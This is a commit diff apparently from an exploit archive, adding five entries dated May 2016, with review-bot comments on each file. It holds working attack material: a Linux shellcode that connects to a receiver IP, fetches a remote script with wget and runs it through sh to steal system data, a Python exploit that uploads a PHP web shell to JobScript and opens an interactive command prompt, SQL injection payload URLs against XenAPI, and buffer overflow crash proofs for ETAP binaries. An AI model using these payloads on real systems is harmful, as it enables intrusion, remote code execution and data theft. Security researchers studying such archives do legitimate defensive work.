DB: 2016-05-24

5 new exploits

Operation Technology ETAP 14.1.0 - Local Privilege Escalation
Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities
Linux x86_64 Information Stealer Shellcode
Job Script by Scubez - Remote Code Execution
XenAPI 1.4.1 for XenForo - Multiple SQL Injections
Offensive Security 2016-05-24 05:03:46 +00:00
parent 84d38df739
commit 399580a6c2
6 changed files with 1606 additions and 0 deletions


@ -36029,3 +36029,8 @@ id,file,description,date,author,platform,type,port
39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0 39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0
39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0 39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
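Review bot: The added rows start at id 39845 while the last context row is 39843, so id 39844 is skipped; confirm the gap is intentional or add the missing row. The description for 39847 ("Linux x86_64 Information Stealer Shellcode") also drops the "Product - Issue" separator that the other four new rows and the context rows use, which makes the description column harder to filter consistently.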


@ -0,0 +1,576 @@
/*
# Title : Linux x86_64 information stealer
# Date : 23-05-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
# Contact : shifath12@gmail.com
*/
/*
How does this shellcode works
-----------------------------------
1. First it connects to the information reciver
2. then it download a sh script from http://192.168.30.129/pri.sh (server running on Kali linux)
3. duplicating stdout,stderr with socket descriptor
4. then it execute the script using sh
*/
/*
Note: the pri.sh file was in kali linux.the server was Kali linux
client was Ubuntu
it downloads the pri.sh from kali linux
and Executes it on Ubuntu
*/
/*
Requirements of this shellcode
--------------------------------------
1.link of pri.sh (You can Found it on http://pastebin.com/V4gudKL5 ) . this script isn't mine.I've taken it from another.I customized the script
2.reciver ip
*/
/*
How to use this shellcode
---------------------------------
1. Upload the pri.sh any site
2. TO download the pri.sh , U need to Customize the wget procedure (I've marked where to customized)
3. Customize the connect procedure for connect to the reciver where i marked
4. U need to know assembly to completed 1,2 instruction
*/
/*
Reciver
---------
To recive the Information U may Use Netcat
If U want to view the informations on Web browser , I've a php script for U. upload it any site.
<?php
if (!($sock = socket_create(AF_INET, SOCK_STREAM, 0)))
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Couldn't create socket: [$errorcode] $errormsg \n");}
echo "Socket created \n\n";
if ( !socket_bind($sock, "0.0.0.0" , 1532) )
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Could not bind socket : [$errorcode] $errormsg \n");}
echo "Socket bind OK \n\n";
if (!socket_listen ($sock , 10))
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Could not listen on socket : [$errorcode] $errormsg \n");}
echo "Socket listen OK \n\n\n";
echo "Waiting for incoming connections... \n";
//Accept incoming connection - This is a blocking call
$client = socket_accept($sock);
//display information about the client who is connected
if (socket_getpeername($client , $address , $port))
{
echo "Client $address : $port is now connected to us. \n";
}
//read data from the incoming socket
while(1)
{
$i= socket_recv($client,$buf, 1024000,MSG_WAITALL);
if($i<=0)
die("\nconnection closed by $address");
else
echo $buf."\n\n";
}
?>
if U this script , the reciver ip will be the website ip
BUT I RECOMMEND U TO USE NETCAT
*/
/*
Disassembly of section .text:
0000000000400080 <_start>:
400080: 6a 06 pushq $0x6
400082: 6a 01 pushq $0x1
400084: 6a 02 pushq $0x2
400086: 5f pop %rdi
400087: 5e pop %rsi
400088: 5a pop %rdx
400089: 6a 29 pushq $0x29
40008b: 58 pop %rax
40008c: 0f 05 syscall
40008e: 48 31 db xor %rbx,%rbx
400091: 48 89 c3 mov %rax,%rbx
400094: 48 31 c0 xor %rax,%rax
400097: 48 31 ff xor %rdi,%rdi
40009a: b0 39 mov $0x39,%al
40009c: 0f 05 syscall
40009e: 4d 31 c9 xor %r9,%r9
4000a1: 4c 39 c8 cmp %r9,%rax
4000a4: 74 18 je 4000be <connect>
4000a6: 6a 3c pushq $0x3c
4000a8: 58 pop %rax
4000a9: 0f 05 syscall
00000000004000ab <retry>:
4000ab: 48 31 f6 xor %rsi,%rsi
4000ae: 48 f7 e6 mul %rsi
4000b1: 56 push %rsi
4000b2: 6a 3c pushq $0x3c
4000b4: 48 89 e7 mov %rsp,%rdi
4000b7: b0 23 mov $0x23,%al
4000b9: 0f 05 syscall
4000bb: eb 01 jmp 4000be <connect>
4000bd: c3 retq
00000000004000be <connect>:
4000be: 6a 10 pushq $0x10
4000c0: 5a pop %rdx
4000c1: 53 push %rbx
4000c2: 5f pop %rdi
4000c3: 48 31 c0 xor %rax,%rax
4000c6: 50 push %rax
4000c7: 50 push %rax
4000c8: 50 push %rax
4000c9: c6 04 24 02 movb $0x2,(%rsp)
4000cd: 66 c7 44 24 02 05 fc movw $0xfc05,0x2(%rsp)
4000d4: c7 44 24 04 c0 a8 1e movl $0x811ea8c0,0x4(%rsp)
4000db: 81
4000dc: 48 89 e6 mov %rsp,%rsi
4000df: b0 2a mov $0x2a,%al
4000e1: 0f 05 syscall
4000e3: 48 31 ff xor %rdi,%rdi
4000e6: 48 39 f8 cmp %rdi,%rax
4000e9: 7c c0 jl 4000ab <retry>
4000eb: 48 31 c0 xor %rax,%rax
4000ee: 48 31 f6 xor %rsi,%rsi
4000f1: 48 ff c6 inc %rsi
4000f4: 48 89 df mov %rbx,%rdi
4000f7: b0 21 mov $0x21,%al
4000f9: 0f 05 syscall
4000fb: 48 31 c0 xor %rax,%rax
4000fe: 48 ff c6 inc %rsi
400101: 48 89 df mov %rbx,%rdi
400104: b0 21 mov $0x21,%al
400106: 0f 05 syscall
400108: 48 31 c0 xor %rax,%rax
40010b: 48 83 c0 39 add $0x39,%rax
40010f: 0f 05 syscall
400111: 48 31 ff xor %rdi,%rdi
400114: 4d 31 e4 xor %r12,%r12
400117: 49 89 c4 mov %rax,%r12
40011a: 48 39 f8 cmp %rdi,%rax
40011d: 74 59 je 400178 <wget>
40011f: 4d 31 d2 xor %r10,%r10
400122: 48 31 d2 xor %rdx,%rdx
400125: 4c 89 d6 mov %r10,%rsi
400128: 4c 89 e7 mov %r12,%rdi
40012b: 48 31 c0 xor %rax,%rax
40012e: b0 3d mov $0x3d,%al
400130: 0f 05 syscall
400132: 48 31 c0 xor %rax,%rax
400135: 48 31 d2 xor %rdx,%rdx
400138: 50 push %rax
400139: 50 push %rax
40013a: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp)
400141: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp)
400148: 68
400149: 48 89 e7 mov %rsp,%rdi
40014c: 50 push %rax
40014d: 50 push %rax
40014e: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
400155: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
40015c: c6 44 24 06 68 movb $0x68,0x6(%rsp)
400161: 48 89 e6 mov %rsp,%rsi
400164: 52 push %rdx
400165: 56 push %rsi
400166: 57 push %rdi
400167: 48 89 e6 mov %rsp,%rsi
40016a: 48 83 c0 3b add $0x3b,%rax
40016e: 0f 05 syscall
400170: 41 51 push %r9
400172: 5f pop %rdi
400173: 6a 03 pushq $0x3
400175: 58 pop %rax
400176: 0f 05 syscall
0000000000400178 <wget>:
400178: 48 31 c0 xor %rax,%rax
40017b: 50 push %rax
40017c: 50 push %rax
40017d: 50 push %rax
40017e: c7 04 24 2f 75 73 72 movl $0x7273752f,(%rsp)
400185: c7 44 24 04 2f 62 69 movl $0x6e69622f,0x4(%rsp)
40018c: 6e
40018d: c7 44 24 08 2f 2f 77 movl $0x67772f2f,0x8(%rsp)
400194: 67
400195: 66 c7 44 24 0c 65 74 movw $0x7465,0xc(%rsp)
40019c: 48 89 e7 mov %rsp,%rdi
40019f: 50 push %rax
4001a0: 50 push %rax
4001a1: 50 push %rax
4001a2: 50 push %rax
4001a3: c7 04 24 68 74 74 70 movl $0x70747468,(%rsp)
4001aa: c7 44 24 04 3a 2f 2f movl $0x312f2f3a,0x4(%rsp)
4001b1: 31
4001b2: c7 44 24 08 39 32 2e movl $0x312e3239,0x8(%rsp)
4001b9: 31
4001ba: c7 44 24 0c 36 38 2e movl $0x332e3836,0xc(%rsp)
4001c1: 33
4001c2: c7 44 24 10 30 2e 31 movl $0x32312e30,0x10(%rsp)
4001c9: 32
4001ca: c7 44 24 14 39 2f 70 movl $0x72702f39,0x14(%rsp)
4001d1: 72
4001d2: c7 44 24 18 69 2e 73 movl $0x68732e69,0x18(%rsp)
4001d9: 68
4001da: 48 89 e6 mov %rsp,%rsi
4001dd: 48 31 d2 xor %rdx,%rdx
4001e0: 50 push %rax
4001e1: 66 c7 04 24 2d 4f movw $0x4f2d,(%rsp)
4001e7: 48 89 e1 mov %rsp,%rcx
4001ea: 50 push %rax
4001eb: 50 push %rax
4001ec: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
4001f3: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
4001fa: c6 44 24 06 68 movb $0x68,0x6(%rsp)
4001ff: 49 89 e7 mov %rsp,%r15
400202: 52 push %rdx
400203: 41 57 push %r15
400205: 51 push %rcx
400206: 56 push %rsi
400207: 57 push %rdi
400208: 48 89 e6 mov %rsp,%rsi
40020b: b0 3b mov $0x3b,%al
40020d: 0f 05 syscall
*/
/*
section .text
global _start
;-----------------
_start:
;socket()
push 6
push 1
push 2
pop rdi
pop rsi
pop rdx
push 41
pop rax
syscall
;------------------
xor rbx,rbx
mov rbx,rax ;socket descriptor
;-------------
xor rax,rax
xor rdi,rdi
mov al,57
syscall
xor r9,r9
cmp rax,r9
jz connect
push byte 60
pop rax
syscall
retry:
xor rsi,rsi
mul rsi
push rsi
push byte 60 ;1 min ( change it if U want )
mov rdi,rsp
mov al,35
syscall
jmp connect
ret
connect:
;connect()
push 16
pop rdx
push rbx
pop rdi
xor rax,rax
push rax
push rax
push rax
mov [rsp],byte 2
;-----------------------------------
;customize these staetments
mov [rsp+2],word 0xfc05 ;port 1532 ( U may change it, As U wish )
mov [rsp+4],dword 0x811ea8c0 ;ip of reciver (must change it)
;--------------------------------------
mov rsi,rsp
mov al,42
syscall
xor rdi,rdi
cmp rax,rdi
jl retry
;------------dup2(sd,1)
xor rax,rax
xor rsi,rsi
inc rsi
mov rdi,rbx
mov al,33
syscall
;------------
;------------dup2(sd,2)
xor rax,rax
inc rsi
mov rdi,rbx
mov al,33
syscall
;------------
;fork()
xor rax,rax
add rax,57
syscall
xor rdi,rdi
xor r12,r12
mov r12,rax ;pid
cmp rax,rdi
jz wget
;---------------
;wait4()
xor r10,r10 ;null
xor rdx,rdx ;null
mov rsi,r10 ;status
mov rdi,r12 ;pid
xor rax,rax
mov al,61
syscall
;;
;-------------------------
;execve("//bin/sh",{"//bin/sh",".pri.sh",NULL},NULL);
xor rax,rax
xor rdx,rdx
push rax
push rax
mov [rsp],dword '//bi'
mov [rsp+4],dword 'n/sh'
mov rdi,rsp
push rax
push rax
mov [rsp],dword '.pri'
mov [rsp+4],word '.s'
mov [rsp+6],byte 'h'
mov rsi,rsp
push rdx
push rsi
push rdi
mov rsi,rsp
add rax,59
syscall
;--------
;close(fd)
push r9
pop rdi
push 3
pop rax
syscall
wget:
;execve("/usr/bin//wget",{"/usr/bin//wget","http ://1 92.1 68.3 0.12 9/pr i.sh","-O",".pri.sh",NULL},NULL)
xor rax,rax
push rax
push rax
push rax
mov [rsp],dword '/usr'
mov [rsp+4],dword '/bin'
mov [rsp+8],dword '//wg'
mov [rsp+12],word 'et'
mov rdi,rsp
push rax
push rax
push rax
push rax
;----------------------
;cusmizetd these statements for the link of pri.sh
mov [rsp],dword 'http'
mov [rsp+4],dword '://1'
mov [rsp+8],dword '92.1'
mov [rsp+12],dword '68.3'
mov [rsp+16],dword '0.12'
mov [rsp+20],dword '9/pr'
mov [rsp+24],dword 'i.sh'
;------------------------
mov rsi,rsp
xor rdx,rdx
push rax
mov [rsp],word '-O'
mov rcx,rsp
push rax
push rax
mov [rsp],dword '.pri'
mov [rsp+4],word '.s'
mov [rsp+6],byte 'h'
mov r15,rsp
push rdx
push r15
push rcx
push rsi
push rdi
mov rsi,rsp
mov al,59
syscall
*/
#include<stdio.h>
#include<string.h>
char shellcode[]="\x6a\x06\x6a\x01\x6a\x02\x5f\x5e\x5a\x6a\x29\x58\x0f\x05\x48\x31\xdb\x48\x89\xc3\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x74\x18\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x6a\x3c\x48\x89\xe7\xb0\x23\x0f\x05\xeb\x01\xc3\x6a\x10\x5a\x53\x5f\x48\x31\xc0\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xfc\xc7\x44\x24\x04\xc0\xa8\x1e\x81\x48\x89\xe6\xb0\x2a\x0f\x05\x48\x31\xff\x48\x39\xf8\x7c\xc0\x48\x31\xc0\x48\x31\xf6\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\x48\x31\xff\x4d\x31\xe4\x49\x89\xc4\x48\x39\xf8\x74\x59\x4d\x31\xd2\x48\x31\xd2\x4c\x89\xd6\x4c\x89\xe7\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x41\x51\x5f\x6a\x03\x58\x0f\x05\x48\x31\xc0\x50\x50\x50\xc7\x04\x24\x2f\x75\x73\x72\xc7\x44\x24\x04\x2f\x62\x69\x6e\xc7\x44\x24\x08\x2f\x2f\x77\x67\x66\xc7\x44\x24\x0c\x65\x74\x48\x89\xe7\x50\x50\x50\x50\xc7\x04\x24\x68\x74\x74\x70\xc7\x44\x24\x04\x3a\x2f\x2f\x31\xc7\x44\x24\x08\x39\x32\x2e\x31\xc7\x44\x24\x0c\x36\x38\x2e\x33\xc7\x44\x24\x10\x30\x2e\x31\x32\xc7\x44\x24\x14\x39\x2f\x70\x72\xc7\x44\x24\x18\x69\x2e\x73\x68\x48\x89\xe6\x48\x31\xd2\x50\x66\xc7\x04\x24\x2d\x4f\x48\x89\xe1\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x49\x89\xe7\x52\x41\x57\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; /* insert shellcode here */
int main()
{
printf("shellcode length %ld",( unsigned long ) strlen(shellcode));
( * (int(*)()) shellcode) ();
}
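Review bot: The "How does this shellcode works" comment at the top lists the download, then the stdout/stderr duplication, then execution, but the assembly source performs both `dup2` calls before the second `fork()` and the `wget` `execve`, and it never mentions the first `fork()` after `socket()` where the parent exits; reorder and complete the list so the documentation matches the code. In the source listing the `ret` after `jmp connect` is unreachable, and the `close(fd)` block after the `execve` of `//bin/sh` only runs if that call fails and passes `r9` (zeroed earlier) rather than the socket descriptor kept in `rbx`. In `main()`, `%ld` is paired with an `unsigned long` argument (should be `%lu`) and the function has no explicit return value.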

platforms/php/webapps/39848.py Executable file (128 additions)

@ -0,0 +1,128 @@
#!C:/Python27/python.exe -u
#
#
# JobScript Remote Code Execution Exploit
#
#
# Vendor: Jobscript
# Product web page: http://www.jobscript.in
# Affected version: Unknown
#
# Summary: JobScript is inbuilt structured website was developed in PHP and MySQL
# database. It's a complete job script for those who wants to start a professional
# job portal website like naukri.com, monster.com, clickjobs.com or any such major
# job portals. Jobscript was designed and developed with the following features like
# control panel for Employer's and also for Job Seeker's, email alerts, job search,
# online resume, payment and membership plans.
#
# Desc: JobScript suffers from an authenticated arbitrary PHP code execution. The
# vulnerability is caused due to the improper verification of uploaded files in
# '/admin-ajax.php' script thru the 'name' and 'file' POST parameters. This can
# be exploited to execute arbitrary PHP code by uploading a malicious PHP script
# file with '.php' extension (to bypass the '.htaccess' block rule) that will be
# stored in '/jobmonster/wp-content/uploads/jobmonster/' directory.
#
# Tested on: Apache 2.4.9
# PHP 5.4.26
#
# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2016-5322
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5322.php
#
#
# 31.03.2016
#
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import os, time, re, requests, httplib
from cStringIO import StringIO
from urllib2 import URLError
global file, file1
file = ';nonce'
file1 = '"security"'
host = sys.argv[1]
cj = cookielib.CookieJar()
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
prelogin = opener2.open('http://'+host+'/jobmonster/member-2/')
output = prelogin.read()
for line in output.splitlines():
if file1 in line:
security = str(line.split("=")[4:])[3:13]
break
print 'Login please.'
username = raw_input('Enter username: ')
password = raw_input('Enter password: ')
login_data = urllib.urlencode({
'action' : 'noo_ajax_login',
'log' : username,
'pwd' : password,
'remember' : 'false',
'security' : security,
'redirect_to' : 'http%3A%2F%2Fcscript.in%2Fjobmonster%2Fmember-2%3Fpagename%3Dmember-2%26logged_in%3D1'
})
login = opener2.open('http://'+host+'/jobmonster/wp-admin/admin-ajax.php', login_data)
auth = login.read()
if re.search(r'false', auth):
print 'Incorrect username or password'
sys.exit()
else:
print 'Authenticated'
response = opener2.open('http://'+host+'/jobmonster/member-2/?pagename=member-2&logged_in=1')
response = opener2.open('http://'+host+'/jobmonster/post-a-resume/?action=resume_general')
output = response.read()
for line in output.splitlines():
if file in line:
nonce = str(line.split("=")[3:])[28:38]
headers = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','Referer':'\'http://'+host+'/jobmonster/post-a-resume/?action=resume_general\'','Accept-Language':'en-US,en;q=0.5','Content-type':'multipart/form-data; boundary=---------------------------51402178812572','Connection':'close','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Encoding':'gzip, deflate','Content-length':'335'}
body = """-----------------------------51402178812572
Content-Disposition: form-data; name="name"
RCE.php
-----------------------------51402178812572
Content-Disposition: form-data; name="file"; filename="RCE.php"
Content-Type: application/pdf
<?php
system($_GET['cmd']);
?>
-----------------------------51402178812572--"""
response = requests.post('http://'+host+'/jobmonster/wp-admin/admin-ajax.php?action=noo_plupload&nonce='+nonce+'', data=body, headers=headers, cookies=cj)
raw_input()
while True:
try:
cmd = raw_input('shell@'+host+':~# ')
execute = opener2.open('http://'+host+'/jobmonster/wp-content/uploads/jobmonster/RCE.php?cmd='+urllib.quote(cmd))
reverse = execute.read()
print reverse
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()
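Review bot: The import block pulls in modules the script never uses (`itertools`, `mimetools`, `mimetypes`, `os`, `time`, `httplib`, `StringIO`, `URLError`), and `global file, file1` at module level has no effect while `file` shadows the Python 2 builtin; trim the imports and rename the two marker strings. The header also leaves "Affected version: Unknown" and names no fix or mitigation, and `redirect_to` hard-codes a `cscript.in` URL instead of being built from `host` like every other request, so the advisory text should state the tested version and the sample should not embed a third-party hostname.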

platforms/php/webapps/39849.txt Executable file (85 additions)

@ -0,0 +1,85 @@
[RCESEC-2016-002] XenAPI v1.4.1 for XenForo Multiple Unauthenticated SQL Injections
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: XenAPI for XenForo
Vendor URL: github.com/Contex/XenAPI
Type: SQL Injection [CWE-89]
Date found: 2016-05-20
Date published: 2016-05-23
CVSSv3 Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
XenAPI for XenForo v1.4.1
older versions may be affected too but were not tested.
4. INTRODUCTION
===============
This Open Source REST API allows usage of several of XenForo's functions,
such as authentication, user information and many other functions!
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The plugin "XenAPI" for XenForo offers a REST Api with different functions
to query and edit information from the XenForo database backend. Amongst
those are "getGroup" and "getUsers", which can be called without
authentication (default) and since the application does not properly
validate and sanitize the "value" parameter, it is possible to inject
arbitrary SQL commands into the XenForo backend database.
The following proof-of-concepts exploit each vulnerable REST action
and extract the hostname of the server:
https://127.0.0.1/api.php?action=getUsers&value=' UNION ALL SELECT
CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%2C0x20))%2CNULL%23
https://127.0.0.1/api.php?action=getGroup&value=' UNION ALL SELECT
NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(IFNULL(CAST(%40%40HOSTNAME AS
CHAR)%2C0x20))%2CNULL%23
6. RISK
=======
The vulnerability allows remote attackers to read sensitive information
from the XenForo database like usernames and passwords. Since the affected
REST actions do not require an authentication hash, these vulnerabilities
can be exploited by an unauthenticated attacker.
7. SOLUTION
===========
Update to the latest version v1.4.2
8. REPORT TIMELINE
==================
2016-05-20: Discovery of the vulnerability
2016-05-20: Notified vendor via contact address
2016-05-20: Vendor provides update for both issues
2016-05-21: Provided update fixes the reported issues
2016-05-21: Vendor publishes update
2016-05-23: Advisory released
9. REFERENCES
=============
https://github.com/Contex/XenAPI/commit/00a737a1fe45ffe5c5bc6bace44631ddb73f2ecf
https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336
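Review bot: Section 7 only says "Update to the latest version v1.4.2"; it should point at the fix commit already listed in section 9 so readers can confirm how the `value` parameter of `getUsers` and `getGroup` is handled after the update. The two proof-of-concept URLs in section 5 are hard-wrapped across lines and mix a raw quote and raw spaces with percent-encoded characters, so each should sit on one line in a literal block, and the 2016-05-21 timeline entry "Provided update fixes the reported issues" should say who verified the fix.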

platforms/windows/dos/39846.txt Executable file (331 additions)

@ -0,0 +1,331 @@

Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities
Vendor: Operation Technology, Inc.
Product web page: http://www.etap.com
Affected version: 14.1.0.0
Summary: Enterprise Software Solution for Electrical Power Systems. ETAP
is the most comprehensive electrical engineering software platform for the
design, simulation, operation, and automation of generation, transmission,
distribution, and industrial systems. As a fully integrated model-driven
enterprise solution, ETAP extends from modeling to operation to offer a
Real-Time Power Management System.
Desc: Multiple ETAP binaries are prone to a stack-based buffer overflow
vulnerability because the application fails to handle malformed arguments.
An attacker can exploit these issues to execute arbitrary code within the
context of the application or to trigger a denial-of-service conditions.
Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64
Microsoft Windows 7 Ultimate SP1 (EN) x86_64
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5324
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php
07.04.2016
--
Confirmed vulnerable binaries:
------------------------------
acsdvd.exe
ca.exe
csdvd.exe
DBExtractConsoleApp.exe
dccalc.exe
etarcgis.exe
etarcgis92.exe
etarcgis93.exe
ETArcGIS_TD.exe
ETArcGIS_TD10.exe
etcabp.exe
etcp.exe
etgrd.exe
ETPanelRep.exe
ET_CATIA.exe
et_ieee.exe
harmonic.exe
LA3PH.exe
LF3PH.exe
lffd.exe
lfgs.exe
lfle.exe
lfnr.exe
ms.exe
OCP.exe
opf.exe
OtiMongoConvert.exe
PlotCompare64.exe
ra.exe
SC3Ph.exe
scansi1p.exe
scansi3p.exe
SCGost1p.exe
sciec1p.exe
sciec3p.exe
sciectr.exe
scsource.exe
SFA.exe
so3ph.exe
stlf.exe
svc.exe
TDULF.exe
ts.exe
uc.exe
PoCs:
-----
[vuln binary] [>256 bytes as arg]
===================================
C:\ETAP 1410>etcp.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(281c.202c): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
*** WARNING: Unable to verify checksum for C:\ETAP 1410\etcp.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\ETAP 1410\etcp.exe
eax=00000041 ebx=00190002 ecx=0000000a edx=00000365 esi=00882966 edi=000003eb
eip=00407f38 esp=0018f660 ebp=0018f778 iopl=0 nv up ei pl nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
etcp+0x7f38:
00407f38 668943fe mov word ptr [ebx-2],ax ds:002b:00190000=6341
0:000> !exchain
0018ff3c: etcp+10041 (00410041)
Invalid exception stack at 00410041
===================================
C:\ETAP 1410>PlotCompare64.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
at System.String.wcslen(Char* ptr)
at System.String.CtorCharPtr(Char* ptr)
at wmain(Int32 argc, Char** argv, Char** envp)
at wmainCRTStartup()
(3a98.1e20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll
*** ERROR: Module load completed but symbols could not be loaded for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll
mscorlib_ni+0x48f380:
000007fe`dd6df380 0fb701 movzx eax,word ptr [rcx] ds:0045005c`003a0043=????
0:000> d rdi
00000000`0278f558 00 65 93 dd fe 07 00 00-06 02 00 00 41 00 41 00 .e..........A.A.
00000000`0278f568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f5a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f5b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f5c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
===============================
